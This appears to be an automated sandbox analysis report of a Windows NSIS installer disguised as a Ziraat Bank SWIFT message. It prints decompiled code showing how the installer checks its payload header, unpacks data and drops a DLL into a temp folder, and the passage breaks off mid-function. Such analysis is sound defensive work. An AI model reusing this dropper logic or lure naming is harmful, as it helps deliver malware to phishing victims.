                                  control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 196 402eb2-402eb7 189->196 197 402de7-402dea 189->197 191 402d02 190->191 192 402d04-402d0a call 4031a8 190->192 191->192 198 402d0f-402d11 192->198 196->182 199 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 197->199 200 402dec-402dfd call 4031da call 4031a8 197->200 201 402d17-402d1d 198->201 202 402e6e-402e76 call 402bc5 198->202 227 402e64-402e69 199->227 228 402e78-402ea8 call 4031da call 402f01 199->228 220 402e02-402e04 200->220 205 402d9d-402da1 201->205 206 402d1f-402d37 call 40571d 201->206 202->196 210 402da3-402da9 call 402bc5 205->210 211 402daa-402db0 205->211 206->211 224 402d39-402d40 206->224 210->211 216 402db2-402dc0 call 405e0f 211->216 217 402dc3-402dcd 211->217 216->217 217->189 217->190 220->196 225 402e0a-402e10 220->225 224->211 229 402d42-402d49 224->229 225->196 225->199 227->182 237 402ead-402eb0 228->237 229->211 231 402d4b-402d52 229->231 231->211 233 402d54-402d5b 231->233 233->211 234 402d5d-402d7d 233->234 234->196 236 402d83-402d87 234->236 238 402d89-402d8d 236->238 239 402d8f-402d97 236->239 237->196 240 402eb9-402eca 237->240 238->189 238->239 239->211 241 402d99-402d9b 239->241 242 402ed2-402ed7 240->242 243 402ecc 240->243 241->211 244 402ed8-402ede 242->244 243->242 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                                  C-Code - Quality: 96%
                                  			E00402C5B(void* __eflags, signed int _a4) {
                                  				long _v8;
                                  				long _v12;
                                  				intOrPtr _v16;
                                  				long _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				signed int _v40;
                                  				char _v300;
                                  				signed int _t54;
                                  				void* _t57;
                                  				void* _t62;
                                  				intOrPtr _t65;
                                  				void* _t68;
                                  				intOrPtr* _t70;
                                  				intOrPtr _t71;
                                  				signed int _t77;
                                  				signed int _t82;
                                  				signed int _t83;
                                  				signed int _t89;
                                  				intOrPtr _t92;
                                  				signed int _t101;
                                  				signed int _t103;
                                  				void* _t105;
                                  				signed int _t106;
                                  				signed int _t109;
                                  				void* _t110;
                                  
                                  				_v8 = 0;
                                  				_v12 = 0;
                                  				 *0x423eac = GetTickCount() + 0x3e8;
                                  				GetModuleFileNameA(0, "C:\\Users\\frontdesk\\Desktop\\Ziraat Bankasi Swift Mesaji.exe", 0x400);
                                  				_t105 = E0040575C("C:\\Users\\frontdesk\\Desktop\\Ziraat Bankasi Swift Mesaji.exe", 0x80000000, 3);
                                  				 *0x409010 = _t105;
                                  				if(_t105 == 0xffffffff) {
                                  					return "Error launching installer";
                                  				}
                                  				E00405A85("C:\\Users\\frontdesk\\Desktop", "C:\\Users\\frontdesk\\Desktop\\Ziraat Bankasi Swift Mesaji.exe");
                                  				E00405A85(0x42b000, E004055BF("C:\\Users\\frontdesk\\Desktop"));
                                  				_t54 = GetFileSize(_t105, 0);
                                  				__eflags = _t54;
                                  				 *0x41f048 = _t54;
                                  				_t109 = _t54;
                                  				if(_t54 <= 0) {
                                  					L22:
                                  					E00402BC5(1);
                                  					__eflags =  *0x423eb4;
                                  					if( *0x423eb4 == 0) {
                                  						goto L30;
                                  					}
                                  					__eflags = _v12;
                                  					if(_v12 == 0) {
                                  						L26:
                                  						_t57 = GlobalAlloc(0x40, _v20); // executed
                                  						_t110 = _t57;
                                  						E00405E7D(0x40afb0);
                                  						E0040578B( &_v300, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\"); // executed
                                  						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                  						__eflags = _t62 - 0xffffffff;
                                  						 *0x409014 = _t62;
                                  						if(_t62 != 0xffffffff) {
                                  							_t65 = E004031DA( *0x423eb4 + 0x1c);
                                  							 *0x41f04c = _t65;
                                  							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                  							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                  							__eflags = _t68 - _v20;
                                  							if(_t68 == _v20) {
                                  								__eflags = _v40 & 0x00000001;
                                  								 *0x423eb0 = _t110;
                                  								 *0x423eb8 =  *_t110;
                                  								if((_v40 & 0x00000001) != 0) {
                                  									 *0x423ebc =  *0x423ebc + 1;
                                  									__eflags =  *0x423ebc;
                                  								}
                                  								_t45 = _t110 + 0x44; // 0x44
                                  								_t70 = _t45;
                                  								_t101 = 8;
                                  								do {
                                  									_t70 = _t70 - 8;
                                  									 *_t70 =  *_t70 + _t110;
                                  									_t101 = _t101 - 1;
                                  									__eflags = _t101;
                                  								} while (_t101 != 0);
                                  								_t71 =  *0x41703c; // 0x4e8e4
                                  								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                                  								E0040571D(0x423ec0, _t110 + 4, 0x40);
                                  								__eflags = 0;
                                  								return 0;
                                  							}
                                  							goto L30;
                                  						}
                                  						return "Error writing temporary file. Make sure your temp folder is valid.";
                                  					}
                                  					E004031DA( *0x417038);
                                  					_t77 = E004031A8( &_a4, 4); // executed
                                  					__eflags = _t77;
                                  					if(_t77 == 0) {
                                  						goto L30;
                                  					}
                                  					__eflags = _v8 - _a4;
                                  					if(_v8 != _a4) {
                                  						goto L30;
                                  					}
                                  					goto L26;
                                  				} else {
                                  					do {
                                  						_t106 = _t109;
                                  						asm("sbb eax, eax");
                                  						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
                                  						__eflags = _t109 - _t82;
                                  						if(_t109 >= _t82) {
                                  							_t106 = _t82;
                                  						}
                                  						_t83 = E004031A8(0x417048, _t106); // executed
                                  						__eflags = _t83;
                                  						if(_t83 == 0) {
                                  							E00402BC5(1);
                                  							L30:
                                  							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                  						}
                                  						__eflags =  *0x423eb4;
                                  						if( *0x423eb4 != 0) {
                                  							__eflags = _a4 & 0x00000002;
                                  							if((_a4 & 0x00000002) == 0) {
                                  								E00402BC5(0);
                                  							}
                                  							goto L19;
                                  						}
                                  						E0040571D( &_v40, 0x417048, 0x1c);
                                  						_t89 = _v40;
                                  						__eflags = _t89 & 0xfffffff0;
                                  						if((_t89 & 0xfffffff0) != 0) {
                                  							goto L19;
                                  						}
                                  						__eflags = _v36 - 0xdeadbeef;
                                  						if(_v36 != 0xdeadbeef) {
                                  							goto L19;
                                  						}
                                  						__eflags = _v24 - 0x74736e49;
                                  						if(_v24 != 0x74736e49) {
                                  							goto L19;
                                  						}
                                  						__eflags = _v28 - 0x74666f73;
                                  						if(_v28 != 0x74666f73) {
                                  							goto L19;
                                  						}
                                  						__eflags = _v32 - 0x6c6c754e;
                                  						if(_v32 != 0x6c6c754e) {
                                  							goto L19;
                                  						}
                                  						_a4 = _a4 | _t89;
                                  						_t103 =  *0x417038; // 0x42a72
                                  						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
                                  						_t92 = _v16;
                                  						__eflags = _t92 - _t109;
                                  						 *0x423eb4 = _t103;
                                  						if(_t92 > _t109) {
                                  							goto L30;
                                  						}
                                  						__eflags = _a4 & 0x00000008;
                                  						if((_a4 & 0x00000008) != 0) {
                                  							L15:
                                  							_v12 = _v12 + 1;
                                  							_t109 = _t92 - 4;
                                  							__eflags = _t106 - _t109;
                                  							if(_t106 > _t109) {
                                  								_t106 = _t109;
                                  							}
                                  							goto L19;
                                  						}
                                  						__eflags = _a4 & 0x00000004;
                                  						if((_a4 & 0x00000004) != 0) {
                                  							goto L22;
                                  						}
                                  						goto L15;
                                  						L19:
                                  						__eflags = _t109 -  *0x41f048; // 0x44318
                                  						if(__eflags < 0) {
                                  							_v8 = E00405E0F(_v8, 0x417048, _t106);
                                  						}
                                  						 *0x417038 =  *0x417038 + _t106;
                                  						_t109 = _t109 - _t106;
                                  						__eflags = _t109;
                                  					} while (_t109 > 0);
                                  					goto L22;
                                  				}
                                  			}































                                  0x00402c69
                                  0x00402c6c
                                  0x00402c86
                                  0x00402c8b
                                  0x00402c9e
                                  0x00402ca3
                                  0x00402ca9
                                  0x00000000
                                  0x00402cab
                                  0x00402cbc
                                  0x00402ccd
                                  0x00402cd4
                                  0x00402cda
                                  0x00402cdc
                                  0x00402ce1
                                  0x00402ce3
                                  0x00402dd3
                                  0x00402dd5
                                  0x00402dda
                                  0x00402de1
                                  0x00000000
                                  0x00000000
                                  0x00402de7
                                  0x00402dea
                                  0x00402e16
                                  0x00402e1b
                                  0x00402e26
                                  0x00402e28
                                  0x00402e39
                                  0x00402e54
                                  0x00402e5a
                                  0x00402e5d
                                  0x00402e62
                                  0x00402e81
                                  0x00402e91
                                  0x00402ea3
                                  0x00402ea8
                                  0x00402ead
                                  0x00402eb0
                                  0x00402eb9
                                  0x00402ebd
                                  0x00402ec5
                                  0x00402eca
                                  0x00402ecc
                                  0x00402ecc
                                  0x00402ecc
                                  0x00402ed4
                                  0x00402ed4
                                  0x00402ed7
                                  0x00402ed8
                                  0x00402ed8
                                  0x00402edb
                                  0x00402edd
                                  0x00402edd
                                  0x00402edd
                                  0x00402ee0
                                  0x00402ee7
                                  0x00402ef3
                                  0x00402ef8
                                  0x00000000
                                  0x00402ef8
                                  0x00000000
                                  0x00402eb0
                                  0x00000000
                                  0x00402e64
                                  0x00402df2
                                  0x00402dfd
                                  0x00402e02
                                  0x00402e04
                                  0x00000000
                                  0x00000000
                                  0x00402e0d
                                  0x00402e10
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402ce9
                                  0x00402ce9
                                  0x00402cee
                                  0x00402cf2
                                  0x00402cf9
                                  0x00402cfe
                                  0x00402d00
                                  0x00402d02
                                  0x00402d02
                                  0x00402d0a
                                  0x00402d0f
                                  0x00402d11
                                  0x00402e70
                                  0x00402eb2
                                  0x00000000
                                  0x00402eb2
                                  0x00402d17
                                  0x00402d1d
                                  0x00402d9d
                                  0x00402da1
                                  0x00402da4
                                  0x00402da9
                                  0x00000000
                                  0x00402da1
                                  0x00402d2a
                                  0x00402d2f
                                  0x00402d32
                                  0x00402d37
                                  0x00000000
                                  0x00000000
                                  0x00402d39
                                  0x00402d40
                                  0x00000000
                                  0x00000000
                                  0x00402d42
                                  0x00402d49
                                  0x00000000
                                  0x00000000
                                  0x00402d4b
                                  0x00402d52
                                  0x00000000
                                  0x00000000
                                  0x00402d54
                                  0x00402d5b
                                  0x00000000
                                  0x00000000
                                  0x00402d5d
                                  0x00402d63
                                  0x00402d6c
                                  0x00402d72
                                  0x00402d75
                                  0x00402d77
                                  0x00402d7d
                                  0x00000000
                                  0x00000000
                                  0x00402d83
                                  0x00402d87
                                  0x00402d8f
                                  0x00402d8f
                                  0x00402d92
                                  0x00402d95
                                  0x00402d97
                                  0x00402d99
                                  0x00402d99
                                  0x00000000
                                  0x00402d97
                                  0x00402d89
                                  0x00402d8d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402daa
                                  0x00402daa
                                  0x00402db0
                                  0x00402dc0
                                  0x00402dc0
                                  0x00402dc3
                                  0x00402dc9
                                  0x00402dcb
                                  0x00402dcb
                                  0x00000000
                                  0x00402ce9

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402C6F
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe,00000400), ref: 00402C8B
                                    • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe,80000000,00000003), ref: 00405760
                                    • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                                  • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe,C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe,80000000,00000003), ref: 00402CD4
                                  • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                                  Strings
                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                                  • "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" , xrefs: 00402C68
                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
                                  • Error launching installer, xrefs: 00402CAB
                                  • Inst, xrefs: 00402D42
                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                                  • C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
                                  • soft, xrefs: 00402D4B
                                  • C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                                  • Null, xrefs: 00402D54
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                  • String ID: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" $C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                  • API String ID: 2803837635-172339697
                                  • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                                  • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                                  • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                                  • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 329 401778-40177e call 405ce3 322->329 323->329 333 401783-401787 329->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 343 4017a5-4017b7 334->343 344 401795-4017a3 CompareFileTime 334->344 337 4017c5-4017e1 call 40575c 335->337 338 4017bf-4017c0 call 40573d 335->338 345 4017e3-4017e6 337->345 346 401859-401882 call 404e23 call 402f01 337->346 338->337 343->335 344->343 347 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->347 348 40183b-401845 call 404e23 345->348 360 401884-401888 346->360 361 40188a-401896 SetFileTime 346->361 347->333 381 401830-401831 347->381 358 40184e-401854 348->358 362 402886 358->362 360->361 364 40189c-4018a7 FindCloseChangeNotification 360->364 361->364 366 402888-40288c 362->366 367 40287d-402880 364->367 368 4018ad-4018b0 364->368 367->362 370 4018b2-4018c3 call 405aa7 lstrcatA 368->370 371 4018c5-4018c8 call 405aa7 368->371 376 4018cd-402205 call 405346 370->376 371->376 376->366 384 40264e-402655 376->384 381->358 383 401833-401834 381->383 383->348 384->367
                                  C-Code - Quality: 75%
                                  			E00401734(FILETIME* __ebx, void* __eflags) {
                                  				void* _t33;
                                  				void* _t41;
                                  				void* _t43;
                                  				FILETIME* _t49;
                                  				FILETIME* _t62;
                                  				void* _t64;
                                  				signed int _t70;
                                  				FILETIME* _t71;
                                  				FILETIME* _t75;
                                  				signed int _t77;
                                  				void* _t80;
                                  				CHAR* _t82;
                                  				void* _t85;
                                  
                                  				_t75 = __ebx;
                                  				_t82 = E004029E8(0x31);
                                  				 *(_t85 - 8) = _t82;
                                  				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                  				_t33 = E004055E5(_t82);
                                  				_push(_t82);
                                  				if(_t33 == 0) {
                                  					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp")), ??);
                                  				} else {
                                  					_push(0x409b68);
                                  					E00405A85();
                                  				}
                                  				E00405CE3(0x409b68);
                                  				while(1) {
                                  					__eflags =  *(_t85 + 8) - 3;
                                  					if( *(_t85 + 8) >= 3) {
                                  						_t64 = E00405D7C(0x409b68);
                                  						_t77 = 0;
                                  						__eflags = _t64 - _t75;
                                  						if(_t64 != _t75) {
                                  							_t71 = _t64 + 0x14;
                                  							__eflags = _t71;
                                  							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                  						}
                                  						asm("sbb eax, eax");
                                  						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                  						__eflags = _t70;
                                  						 *(_t85 + 8) = _t70;
                                  					}
                                  					__eflags =  *(_t85 + 8) - _t75;
                                  					if( *(_t85 + 8) == _t75) {
                                  						E0040573D(0x409b68);
                                  					}
                                  					__eflags =  *(_t85 + 8) - 1;
                                  					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                  					__eflags = _t41 - 0xffffffff;
                                  					 *(_t85 - 0x34) = _t41;
                                  					if(_t41 != 0xffffffff) {
                                  						break;
                                  					}
                                  					__eflags =  *(_t85 + 8) - _t75;
                                  					if( *(_t85 + 8) != _t75) {
                                  						E00404E23(0xffffffe2,  *(_t85 - 8));
                                  						__eflags =  *(_t85 + 8) - 2;
                                  						if(__eflags == 0) {
                                  							 *((intOrPtr*)(_t85 - 4)) = 1;
                                  						}
                                  						L31:
                                  						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
                                  						__eflags =  *0x423f28;
                                  						goto L32;
                                  					} else {
                                  						E00405A85(0x40a368, 0x424000);
                                  						E00405A85(0x424000, 0x409b68);
                                  						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\FRONTD~1\AppData\Local\Temp\nsyAE26.tmp\tkqqg.dll",  *((intOrPtr*)(_t85 - 0x10)));
                                  						E00405A85(0x424000, 0x40a368);
                                  						_t62 = E00405346("C:\Users\FRONTD~1\AppData\Local\Temp\nsyAE26.tmp\tkqqg.dll",  *(_t85 - 0x24) >> 3) - 4;
                                  						__eflags = _t62;
                                  						if(_t62 == 0) {
                                  							continue;
                                  						} else {
                                  							__eflags = _t62 == 1;
                                  							if(_t62 == 1) {
                                  								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
                                  								L32:
                                  								_t49 = 0;
                                  								__eflags = 0;
                                  							} else {
                                  								_push(0x409b68);
                                  								_push(0xfffffffa);
                                  								E00404E23();
                                  								L29:
                                  								_t49 = 0x7fffffff;
                                  							}
                                  						}
                                  					}
                                  					L33:
                                  					return _t49;
                                  				}
                                  				E00404E23(0xffffffea,  *(_t85 - 8));
                                  				 *0x423f54 =  *0x423f54 + 1;
                                  				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
                                  				 *0x423f54 =  *0x423f54 - 1;
                                  				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                  				_t80 = _t43;
                                  				if( *(_t85 - 0x18) != 0xffffffff) {
                                  					L22:
                                  					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                  				} else {
                                  					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                  					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                  						goto L22;
                                  					}
                                  				}
                                  				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                                  				__eflags = _t80 - _t75;
                                  				if(_t80 >= _t75) {
                                  					goto L31;
                                  				} else {
                                  					__eflags = _t80 - 0xfffffffe;
                                  					if(_t80 != 0xfffffffe) {
                                  						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
                                  					} else {
                                  						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
                                  						lstrcatA(0x409b68,  *(_t85 - 8));
                                  					}
                                  					_push(0x200010);
                                  					_push(0x409b68);
                                  					E00405346();
                                  					goto L29;
                                  				}
                                  				goto L33;
                                  			}
















                                  0x00401734
                                  0x0040173b
                                  0x00401744
                                  0x00401747
                                  0x0040174a
                                  0x0040174f
                                  0x00401757
                                  0x00401773
                                  0x00401759
                                  0x00401759
                                  0x0040175a
                                  0x0040175a
                                  0x00401779
                                  0x00401783
                                  0x00401783
                                  0x00401787
                                  0x0040178a
                                  0x0040178f
                                  0x00401791
                                  0x00401793
                                  0x00401798
                                  0x00401798
                                  0x004017a3
                                  0x004017a3
                                  0x004017b4
                                  0x004017b6
                                  0x004017b6
                                  0x004017b7
                                  0x004017b7
                                  0x004017ba
                                  0x004017bd
                                  0x004017c0
                                  0x004017c0
                                  0x004017c7
                                  0x004017d6
                                  0x004017db
                                  0x004017de
                                  0x004017e1
                                  0x00000000
                                  0x00000000
                                  0x004017e3
                                  0x004017e6
                                  0x00401840
                                  0x00401845
                                  0x004015a8
                                  0x0040264e
                                  0x0040264e
                                  0x0040287d
                                  0x00402880
                                  0x00402880
                                  0x00000000
                                  0x004017e8
                                  0x004017ee
                                  0x004017f9
                                  0x00401806
                                  0x00401811
                                  0x00401827
                                  0x00401827
                                  0x0040182a
                                  0x00000000
                                  0x00401830
                                  0x00401830
                                  0x00401831
                                  0x0040184e
                                  0x00402886
                                  0x00402886
                                  0x00402886
                                  0x00401833
                                  0x00401833
                                  0x00401834
                                  0x00401492
                                  0x00402200
                                  0x00402200
                                  0x00402200
                                  0x00401831
                                  0x0040182a
                                  0x00402888
                                  0x0040288c
                                  0x0040288c
                                  0x0040185e
                                  0x00401863
                                  0x00401871
                                  0x00401876
                                  0x0040187c
                                  0x00401880
                                  0x00401882
                                  0x0040188a
                                  0x00401896
                                  0x00401884
                                  0x00401884
                                  0x00401888
                                  0x00000000
                                  0x00000000
                                  0x00401888
                                  0x0040189f
                                  0x004018a5
                                  0x004018a7
                                  0x00000000
                                  0x004018ad
                                  0x004018ad
                                  0x004018b0
                                  0x004018c8
                                  0x004018b2
                                  0x004018b5
                                  0x004018be
                                  0x004018be
                                  0x004018cd
                                  0x004018d2
                                  0x004021fb
                                  0x00000000
                                  0x004021fb
                                  0x00000000

                                  APIs
                                  • lstrcatA.KERNEL32(00000000,00000000,szoimsdvi,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                  • CompareFileTime.KERNEL32(-00000014,?,szoimsdvi,szoimsdvi,00000000,00000000,szoimsdvi,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                    • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                                    • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                                    • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                                    • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                                    • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                                    • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                  • String ID: C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\nsyAE26.tmp$C:\Users\user~1\AppData\Local\Temp\nsyAE26.tmp\tkqqg.dll$szoimsdvi
                                  • API String ID: 1941528284-554362982
                                  • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                                  • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                                  • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                                  • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 385 402f01-402f10 386 402f12-402f28 SetFilePointer 385->386 387 402f2e-402f39 call 40302c 385->387 386->387 390 403025-403029 387->390 391 402f3f-402f59 ReadFile 387->391 392 403022 391->392 393 402f5f-402f62 391->393 394 403024 392->394 393->392 395 402f68-402f7b call 40302c 393->395 394->390 395->390 398 402f81-402f84 395->398 399 402ff1-402ff7 398->399 400 402f86-402f89 398->400 403 402ff9 399->403 404 402ffc-40300f ReadFile 399->404 401 40301d-403020 400->401 402 402f8f 400->402 401->390 406 402f94-402f9c 402->406 403->404 404->392 405 403011-40301a 404->405 405->401 407 402fa1-402fb3 ReadFile 406->407 408 402f9e 406->408 407->392 409 402fb5-402fb8 407->409 408->407 409->392 410 402fba-402fcf WriteFile 409->410 411 402fd1-402fd4 410->411 412 402fed-402fef 410->412 411->412 413 402fd6-402fe9 411->413 412->394 413->406 414 402feb 413->414 414->401
                                  C-Code - Quality: 93%
                                  			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                                  				long _v8;
                                  				intOrPtr _v12;
                                  				void _t31;
                                  				intOrPtr _t32;
                                  				int _t35;
                                  				long _t36;
                                  				int _t37;
                                  				long _t38;
                                  				int _t40;
                                  				int _t42;
                                  				long _t43;
                                  				long _t44;
                                  				long _t55;
                                  				long _t57;
                                  
                                  				_t31 = _a4;
                                  				if(_t31 >= 0) {
                                  					_t44 = _t31 +  *0x423ef8;
                                  					 *0x41703c = _t44;
                                  					SetFilePointer( *0x409014, _t44, 0, 0); // executed
                                  				}
                                  				_t57 = 4;
                                  				_t32 = E0040302C(_t57);
                                  				if(_t32 >= 0) {
                                  					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
                                  					if(_t35 == 0 || _v8 != _t57) {
                                  						L23:
                                  						_push(0xfffffffd);
                                  						goto L24;
                                  					} else {
                                  						 *0x41703c =  *0x41703c + _t57;
                                  						_t32 = E0040302C(_a4);
                                  						_v12 = _t32;
                                  						if(_t32 >= 0) {
                                  							if(_a12 != 0) {
                                  								_t36 = _a4;
                                  								if(_t36 >= _a16) {
                                  									_t36 = _a16;
                                  								}
                                  								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
                                  								if(_t37 == 0) {
                                  									goto L23;
                                  								} else {
                                  									_t38 = _v8;
                                  									 *0x41703c =  *0x41703c + _t38;
                                  									_v12 = _t38;
                                  									goto L22;
                                  								}
                                  							} else {
                                  								if(_a4 <= 0) {
                                  									L22:
                                  									_t32 = _v12;
                                  								} else {
                                  									while(1) {
                                  										_t55 = 0x4000;
                                  										if(_a4 < 0x4000) {
                                  											_t55 = _a4;
                                  										}
                                  										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
                                  										if(_t40 == 0 || _t55 != _v8) {
                                  											goto L23;
                                  										}
                                  										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
                                  										if(_t42 == 0 || _a16 != _t55) {
                                  											_push(0xfffffffe);
                                  											L24:
                                  											_pop(_t32);
                                  										} else {
                                  											_t43 = _v8;
